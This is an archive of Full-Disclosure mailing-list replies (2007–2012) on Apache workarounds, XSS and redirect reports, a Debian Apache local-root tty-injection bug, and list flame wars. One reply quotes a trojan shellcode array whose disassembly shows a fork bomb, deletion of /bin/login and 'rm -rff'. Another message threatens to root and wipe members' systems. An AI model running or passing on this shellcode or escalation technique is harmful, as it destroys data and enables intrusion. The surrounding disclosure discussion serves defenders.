Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 agreed. That's one of the reasons why I've permanently closed my FB account some time ago ... - -Nik On 01/20/2012 05:26 AM, maxigas wrote: > From: Wesley Kerfoot > Subject: [Full-disclosure] Facebook seems to think my Arch Linux box has > malware on it > Date: Thu, 19 Jan 2012 22:13:06 -0500 > >> The message here for Facebook is that they shouldn’t implement systems that >> they can’t support when they fail. > > Here the message for users is that they shouldn't rely on system they can't > fix (together) when they fail. :P > > maxigas > > -- > > The opinions expressed in this email are not mine. > > Magic: http://maxigas.hu/maxigas.gpg > EE2E D824 B5C3 4544 C2B8 B75F 2183 52B5 8EC1 57C1 > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJPGnSFAAoJEDFLYVOGGjgX3PgH/1g0dyYKdDB6wxc8Ccj7lS6P rgmHVRU822mNEez9JWgFS3F+oucwj4lFErPnORDOvDL9sdZzVVm0AwfnPpfU2RXY W4a8PwxAx9BzRAcJM1Uz6PyKLVe19to9rdJWPuCl8qtQCGlsgbN0lTeiCxpYiJw/ 4qg5eTOUW8NjwKdpKDMwtWgt/SVLe/Bh/iBTAxe//vBqBqPrDq2gQbKOQb6ZBU7j m31yTVgfSD1ejifCDDcwlY3qNsZo7LgM3AudMR2SD/6AofLZbS/o35RSirqlDX4j OCVGI7jthSZ0GlIm6IyU/FO4OEDKsxglogTPmL1MRXZGkIy9+oVfkkKkPCyat+U= =vBMp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New awstats.pl vulnerability?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Same here, I even tried to notify a bunch of the ISP registrators of the IP address range those originated from. - -Nik On 12/13/2011 07:30 AM, Bruce Ediger wrote: > On Mon, 12 Dec 2011, Lamar Spells wrote: > >> For the past several days, I have been seeing thousands of requests >> looking for awstats.pl like this one: > > Yeah, me too. They just started up. I haven't seen any awstats.pl > requests since 2010-05-18, and now I've gotten batches of them, since > about 2011-11-22, but heavier since the start of December. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJO5vwQAAoJEDFLYVOGGjgX8oEH/i3kjBAtJcT1DJvJVcRX4O+9 t2UcvehxpyjalhCttTmQrE8EcLrtGS62K0ZziNQPvXirOtJ0ERcaARsQFiTT7fCi YyEuNDa15nx+wS2dgnKWEyCjz356RobtXgFflrbfHNPmBCRGd/qM3VzquUDYRdef E+JtU0J3RgilXxMFLrZK5GHwZOUKNebv/T6bRPescMzRsX/DO89Csv0kWJM9xvyI kd0El+/thw8aj9/21dB/JWhdbiBozuKd2MG1hTog/xKFVzVqdTzkNoZ7Ok15n91v LoAx7cLqDInmx1syDLOSMhzRoyqGAA9Uq/WuTpDqTDcHjVwjGJPeYjc97dIJWdY= =0+7+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NEVER AGAIN
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Can you please stop this? Thanks On 11/22/2011 09:48 AM, xD 0x41 wrote: > You fucking pieces of shit forget when it was once me who was asking, > for help in regards to mutiple things, and when offered NONE, in > regards to code i later had to find thanks to fucking blakhatz, why > the fuck would i want or care for this list now, forget any > competition i ever started, you clearly want, and, forget to see, even > when it maybe something small for YOU, it maybe NOT for me, yet, i am > hit from every side, nonstop about shit, wich i KNOW there is plenty > of you who also have these codes, and thats exactly why your stfu and > lettin me cop it.Seriously, when i was the one askin , i made NO big > deal, when i was mutiple times confronted with exactly how i acted, > and that was simply to NOT show things, because i did this per person > basis, if i knew i could trust, then they were shown things..and they > will always be shown things, as they remain friends.. the rest of you > who shot your mouths of, watch the hell out, coz you may find a new > user on your system soon called 'arsehole' and all he wants todo is > get root, sdo he can rm it. a nice fuckign wurm you all deserve... > harvesting of your domains, those who spoke out and, bombed me for > shitall, and helped me not one bit when i had my ass on the line for > shit like freepbx :s screw this list, believe it, i will root the > people who annoyed me, one by one, and yes, ill FD that. > now, fuck you all, except the very few, who know who they are . the > rest of you who ignored me, and now dare to backlash chat me about a > crappy bash 0day you DONT have,. go fk yourselfs, and for valdis, i > hope your vt.edu, has a whole slew of new users you suckm as any > kind of friend or moderator your also, the BIGGEST liar, who > cannot code a thing, on this fucking list. > dick. > as for root@fibertel, indeed stfu, it was me on the ophone, just know > that, your job is gone. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJOy1jFAAoJEDFLYVOGGjgXc3cIALjndFGBDVNrlXP8rORE/QY1 rlN1Zr7qMudbIJH3cbMhFSrJzquiAZQwW3GpzUGdvPwfFTWfZHdxZiHJADqDCdrI FwY7coEH2Ido7+2QLhJ/42O62zvjcb44OOV0sIhX0BbI5X/mPSQrf8qlDBZ0Bcs6 UM7/8f0OCzl/wVocgA9556WHtReuc10GvnboNWUSfKmJd1V2BDkBTyThpE1snsU9 QGuta3RfDaW5RWE/eYc5L5MiFC4S4sv95TJyWtGu+IbGOuEmmU31bNhdZnw8XCmO dg5/shHFvINdfxBpbxWromhumKzhaNzqihmyX1TM7+uCpUWN1uBCMYLO/0snhdg= =hXUC -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi,
This one works like charm on my debian stable
LimitRequestFieldSize 200
in the apache2.conf as global directive for all vhosts.
Cheers,
- -Nik
On 08/26/2011 05:56 PM, bodik wrote:
> Dne 08/26/11 13:26, bodik napsal(a):
>>
Option 2: (Pre 2.2 and 1.3)
# Reject request when more than 5 ranges in the Range: header. #
CVE-2011-3192 # RewriteEngine on RewriteCond %{HTTP:range}
!(bytes=[^,]+(,[^,]+){0,4}$|^$) # RewriteCond %{HTTP:request-range}
!(bytes=[^,]+(?:,[^,]+){0,4}$|^$) RewriteRule .* - [F]
>>> ^^ Better use this:
>>>
>>> RewriteEngine on RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
>>> [NC,OR] RewriteCond %{HTTP:request-range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
>>> [NC] RewriteRule .* - [F]
>>>
>>
>> in any case, i found very wierd behavior on some of our webservers. as we
>> applied the first version of workaround, something about 15% of our webpages
>> seems to be broken, but the rest of virtual hosts were working fine.
>
> because of messing with Options FollowSymLinks or SymLinksIfOwnerMatch and
> mod_rewrite i have to implement other workaround ..
>
> b
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEcBAEBAgAGBQJOV7fKAAoJEDFLYVOGGjgXniQH/jQoeD+vKAT1D+PdCijthhNA
Svjhvyl801n/b+ggJvLq6HclMZKacThcuVqtyb+ehf1b+3D9XMeMtieze0sC2Qnt
GAuBKSUI+b7QRSJETjncBqKeVu7RpeeKeKI3aotqXtNTknP+S0McKpPKUYEM591K
iaam/DkmzTob6Ey2J0anQs+58yCqLqEusoojqIy4T8Ql48EDoE/TnSZphA3BGGpC
rZ/r0Hv49SJkTWIwY03+epYDTuIq8+LK9flEkSsKC4OqFkZagx7MEjyDv1Xztj0K
8hsC+iC9k+RCKdAnQVPiJ/CaKgUbNeghuX/bIxCm0edjLFUhootlf7ie8dvnxbs=
=LO33
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] here
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Thanks Andrew! Nice catch! ;-)
Cheers,
- -Nikolay
Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
>
>> char sc[] =
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>> "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>> "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>> "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>> "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>> "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>> "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>> "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>> "\x04\x0B\xCD\x80";
>
>
> Abbreviated disassembly:
>signal(SIGHUP, SIG_IGN)
>something that looks like a 15-level deep fork() bomb
>something involving kill()
>unlink("/bin/login")
>execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
>
> You could at least try to obfuscate your constants a little better.
> That was way too easy.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] peace
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 so? - -Nikolay fabio wrote: > https://intranet.usip.org/datacenter/eps/CustomCal.php > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEVAwUBRxeGtzFLYVOGGjgXAQJHqwf+K9A6fbNUIGa4W2aTEvQf+UqAgCIHiGJF xNJRdhIhnB54gqkDhk8+Gzu4rZovWlZE9bw6EtAcYQCJEyj/1gNd5k89FOa34afB 8UwG59a8Wz8bttBBsoVCKaG3JH/MtjZ9fJwKbqvuXEIHT55YFKlsCIHXtImCXcc6 I8qhiEO3SFPc6/NGO3AJxtN9g90VBlfVt8V57xObmRU1MipjgUKX+DaT7w6dGR5N rAMO9iumwxPzUEStwtzbOs9h/1vwJl+a2wlzXONzxCDirQcWEeNtlGgke4bfmp4v lrQePBwUSMN1y/msO6n8MX+ex3okKsBklWJ9jEqJEvVYcTC7xsGLCg== =a8zs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password hash
Nice explanation Vladis, thanks! Cheers, -Nikolay [EMAIL PROTECTED] wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Wow Vladis shut the fuck up > > On Fri, 05 Oct 2007 10:35:36 -0400 [EMAIL PROTECTED] wrote: > >> On Thu, 04 Oct 2007 22:22:14 EDT, Brian Toovey said: >> >>> Does anyone know what kind of password hash this is? >>> 'password1' = >>> &c6;Ub&c3;&ab;&19;a&cf;&86; >>> >> Hex format would be less likely to be mis-parsed. I'm *guessing* >> you >> mean the hash is x'c65562c3 ab1961cf 86' - which is slightly odd, >> being >> 72 bits long. A salted 64-bit hash, perhaps? Or it might be some >> home-grown >> hash that somebody invented. >> >> If you know what 'password1' hashes to, it's time to do some >> differential >> cryptography and try hashing 'password2', 'password11', >> 'passwor111', and so >> on, to determine how many input characters the hash considers. >> The next thing >> to try is hashing 'qassword1' (which has one bit different from >> 'password1') >> and seeing how many of the output bits change, which will tell you >> the relative >> strength of the hash. A good hash will have about half the bits >> change on a >> one-bit difference (and continuing through q, r, s, t and so on >> won't reveal >> any pattern of *which* bits change), while a bad hash will fail to >> cause a bit >> cascade and only a few bits will be different in the output. >> > -BEGIN PGP SIGNATURE- > Note: This signature can be verified at https://www.hushtools.com/verify > Charset: UTF8 > Version: Hush 2.5 > > wpwEAQECAAYFAkcGdtUACgkQ+dWaEhErNvQLwQP+Ko1yikEE4RLH8sLeEb5e/NeMyVOC > LbhDm1FOs3U0mIEhA0Wuuh/7OP39xI9ot4L7kTZVBLL3b9pF7hrG4Wl2btsZPhBScGFc > LuUwNkW1UM6sEiZOTiysjRw3fcxMghr3uxVxD/fi3e14mJeb8y0Gcd/i7B/I81AVWORO > RlXr0ZY= > =E3Mo > -END PGP SIGNATURE- > > -- > Do you need to diversify your portfolio? Click here for informaton on > trading currency. > http://tagline.hushmail.com/fc/Ioyw6h4eApyx5Oq5Gf7tziyDDQmkClkksyK1XaXAXEQZzL2L1TjxLy/ > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A Request To Everyone
I'd request that all of you stop fighting and leave the list to deal with what it's meant to. Cheers, -Nikolay [EMAIL PROTECTED] wrote: > I'm in favor of booting them all off the list. Let 'em keep their flame wars > on EFNet. > > Geoff > > Sent from my BlackBerry wireless handheld. > > -Original Message- > From: Aditya K Sood <[EMAIL PROTECTED]> > > Date: Thu, 20 Sep 2007 12:57:57 > To:full-disclosure@lists.grok.org.uk > Subject: [Full-disclosure] A Request To Everyone > > > Hi > > After looking at the mail wars , I want to say only two lines. > > I dont know who Meta Info is , Lamer Buster is , LSNN is and all. > I dont know how they are generating mails and putting my name > everywhere. Thats it. > > Thanks to all. > > Regards > Aks > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype - the voip company
Hello, It does not seem to be OS dependent, as I am running debian lenny/sid using skype version 1.4 Beta and it cannot connect. Cheers, -Nik Tonu Samuel wrote: > On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote: >> Hello Simon >> >> Simon Smith wrote: >>> Greetings, >>> Does anyone know any more details about the current skype outage, other >>> than what is being presented on their web-site? It appears that all >> I guess "Problems with Skype login" [1] does tell a little bit more. >> >>[1] >> http://heartbeat.skype.com/2007/08/problems_with_skype_login.html > > Still noone exactly knows what is going on. But there are specilations > that Microsoft intentionally broke it with latest patches and Skype > working hard to find solution. > > I do not have anything better than all others, so take it as rumour only > and think twice if you use closed source including windows or skype. > >Tõnu > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] youtube flagged content age verification bypass
excellent find ;-) cheers, -Nik - Original Message - From: <[EMAIL PROTECTED]> To: Cc: <[EMAIL PROTECTED]> Sent: Friday, June 29, 2007 3:32 PM Subject: [Full-disclosure] youtube flagged content age verification bypass > Youtube.com requires account creation and login before allowing > visitors to view videos flagged by users as inappropriate. > > Sample flagged video: http://www.youtube.com/watch?v=Chei2buYo9s > "This video may contain content that is > inappropriate for some users, as flagged by YouTube's user > community. > To view this video, please verify you are 18 or older by logging in > or signing up." > > alternatively, visit http://www.youtube.com/v/Chei2buYo9s > > -- > Click to find great rates on medical insurance, save big, shop here > http://tagline.hushmail.com/fc/Ioyw6h4d8QNpBm7Xd6WGFaIc6rtGaJkKuMOn8BK3fDUMda8ctqP6SM/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DOS on phrack?
seems up to me as of this moment, -nik - Original Message - From: "Aditya K Sood" <[EMAIL PROTECTED]> To: "scott" <[EMAIL PROTECTED]>; Sent: Sunday, July 01, 2007 9:59 PM Subject: Re: [Full-disclosure] DOS on phrack? > Yup scott > the problem is there. > > Regards > Aditya K Sood > http://www.secniche.org > > scott wrote: > > -BEGIN PGP SIGNED MESSAGE- > > Hash: SHA1 > > > > It seems that Phrack.org is experiencing a serious DoS.I tried a few > > times to connect today to no avail. > > > > Not to increase traffic to the DoS,is anyone else also experiencing the > > same? > > > > Regards, > >Scott > > -BEGIN PGP SIGNATURE- > > Version: GnuPG v1.4.6 (GNU/Linux) > > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > > > iD8DBQFGhfOkelSgjADJQKsRAlD5AKCNo2L7RsiiERAyDYZ53i61duWA6QCdEtqw > > NeYfdpD6AZEoMSGVmClNCWA= > > =nimg > > -END PGP SIGNATURE- > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Paper: Secure file upload in PHP web applications
Very nice presentation. Thanks a lot for sharing with us. Regards, -Nikolay Kichukov Alla Bezroutchko wrote: > Various web applications, such as blogs, forums and photo galleries > allow users to upload files. Providing file upload function without > opening security holes proved to be quite a challenge in PHP web > applications. The applications we have tested suffered from a variety of > security problems, ranging from arbitrary file disclosure to remote > arbitrary code execution. > > The paper describes various security holes occurring in file upload > implementations and suggests a way to implement a secure file upload. > > The paper can be downloaded from > http://www.scanit.be/uploads/php-file-upload.pdf > > Regards, > Alla Bezroutchko > Scanit > http://www.scanit.be/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access viaspecialy crafted html file
Exploit works like a charm on FF 2.0.3 on win2k sp4. Regards, -Nikolay Kichukov - Original Message - From: "carl hardwick" <[EMAIL PROTECTED]> To: Sent: Tuesday, May 01, 2007 10:26 AM Subject: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access viaspecialy crafted html file > Product: Firefox 2.0.0.3 > Description: Out-of-bounds memory access via specialy crafted html file > Type: Remote > > Vulnerability can be exploited by using a large value in a href tag to > create an out-of-bounds memory access. > > Proof Of Concept exploit: > http://www.critical.lt/research/opera_die_happy.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer Crash
Also works on IE 6.0.2800 -nik - Original Message - From: "J. Oquendo" <[EMAIL PROTECTED]> To: "full-disclosure" Sent: Tuesday, April 17, 2007 8:09 PM Subject: [Full-disclosure] Internet Explorer Crash > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability
It would've been nice if that was in English... Anyways, seems to be a nice review.. -nik - Original Message - From: "Julien Dhaille" <[EMAIL PROTECTED]> To: Sent: Tuesday, April 17, 2007 12:29 PM Subject: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability > I wrote a paper about Xss exploitation with this bug. > http://wargan.org/index.php/2007/04/16/9-dotclear-126-hijack-authenticated-session > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A lot of XSS
yes, they seem already fixed, all of them ;_P) Congratulations on the good work. -Nikolay Kichukov - Original Message - From: "Hanno Böck" <[EMAIL PROTECTED]> To: Sent: Friday, March 30, 2007 4:18 PM Subject: [Full-disclosure] A lot of XSS > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability
Hello Aditya, I see your point there. Hope they get it fixed. Should the patch involve some referrer checking? Regards, -Nikolay Kichukov - Original Message - From: "Aditya K Sood" <[EMAIL PROTECTED]> To: "Nikolay Kichukov" <[EMAIL PROTECTED]>; Sent: Thursday, March 29, 2007 7:40 PM Subject: Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability > Nikolay Kichukov wrote: > > Hello there, > > I've read the article, but I still do not see where the severe redirection > > vulnerability is. Is this not a feature of the neworder.box.sk web site to > > allow anyone to be redirected to anypage they submit to redirect.php? > > > > Thanks, > > -Nikolay Kichukov > > > > > > - Original Message - > > From: "Aditya K Sood" <[EMAIL PROTECTED]> > > To: > > Sent: Wednesday, March 28, 2007 8:49 PM > > Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe > > RedirectionVulnerability > > > > > > > >> Hi > >> > >> Previous Rootkit.com Vulnerability have been patched. > >> The neworder.box.sk is famous security website.It inherits very specific > >> redirection attacks. The domain forwarding or URL forwarding not only > >> directly possible through the website but can be called from third party > >> directly. > >> > >> A very generic analysis have been undertaken based on search engine > >> specification.Look into the issues at: > >> > >> http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html > >> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml > >> > >> Regards > >> Zeroknock > >> http://zeroknock.metaeye.org/mlabs > >> > >> ___ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > >> > > > > > > > Hi nikolay > >Thats where the thinking is bit off side. > Remember there > is lot of difference between redirection occurs from the main website > through generating event and the redirection that occurs from the third > party.It will be okay to the feature context if the redirection supports > only from the website. > > More precisely a search engine check is performed at the top to show > that the page is not subjected as standard page for redirection. If its > a feature than it must not be redirected from the third party. > > Thats All. > > Regards > Adi > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability
Hello there, I've read the article, but I still do not see where the severe redirection vulnerability is. Is this not a feature of the neworder.box.sk web site to allow anyone to be redirected to anypage they submit to redirect.php? Thanks, -Nikolay Kichukov - Original Message - From: "Aditya K Sood" <[EMAIL PROTECTED]> To: Sent: Wednesday, March 28, 2007 8:49 PM Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability > Hi > > Previous Rootkit.com Vulnerability have been patched. > The neworder.box.sk is famous security website.It inherits very specific > redirection attacks. The domain forwarding or URL forwarding not only > directly possible through the website but can be called from third party > directly. > > A very generic analysis have been undertaken based on search engine > specification.Look into the issues at: > > http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html > http://zeroknock.metaeye.org/analysis/neworder_red.xhtml > > Regards > Zeroknock > http://zeroknock.metaeye.org/mlabs > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)
Hello Richard, Seems to me I have also been so unprotected for this long ... I love the debian project and hope it is not going to an end... However I already use apache2 for all my machines. Regards, -Nikolay Kichukov - Original Message - From: "Richard Thrippleton" <[EMAIL PROTECTED]> To: "Nikolay Kichukov" <[EMAIL PROTECTED]> Cc: Sent: Tuesday, February 27, 2007 3:37 AM Subject: Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only) > On Mon Feb 26 21:15, Nikolay Kichukov wrote: > > Lool, > > how long has this bug been around? > Almost a year, looking at that original patch that caused the problem. To be > fair, nobody had commented on the security issues until I stumbled across them > a month ago though. > > > Sounds scary. > Yeah, scared me when I first saw it and realised how vulnerable I'd been for so > long. What's also scary is the complete lack of action on what is a fairly > serious problem. I used to think that the Debian project had a sane attitude to > security. Maybe all the good developers have gone to Ubuntu. > > Richard > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS at Aon.at, Austrian ISP
seems already fixed ... good job. -Nikolay Kichukov - Original Message - From: "Florian Stinglmayr" <[EMAIL PROTECTED]> To: ; Sent: Tuesday, March 13, 2007 10:09 AM Subject: [Full-disclosure] XSS at Aon.at, Austrian ISP > Here we go: > > http://jawe.aon.at/search/aon.sp?query=alert(1); > > The issue has been reported to AON before. > > Regards, > Florian Stinglmayr > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)
Lool, how long has this bug been around? Sounds scary. -nik On Mon, February 26, 2007 8:11 pm, Richard Thrippleton wrote: > Version 1.3.34-4 of Apache in the Debian Linux distribution contains a > hole that allows a local user to access a root shell if the webserver has > been restarted manually. This bug does not exist in the upstream apache > distribution, and was patched in specifically by the Debian distribution. > The > bug report is located at > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of > writing (over a month since the root hole was clarified), there has been > no official acknowledgement. It is believed that most of the developers > are tied up in more urgent work, getting the TI-86 distribution of Debian > building in time for release. > > Unlike every other daemon, apache does not abdicate its controlling tty > on startup, and allows it to be inherited by a cgi script (for example, a > local user's CGI executed using suexec). When apache is manually > restarted, the inherited ctty is the stdin of the (presumably root) shell > that invoked the new instance of apache. Any process is permitted to > invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows > it to inject characters that appear to come from the terminal master. > 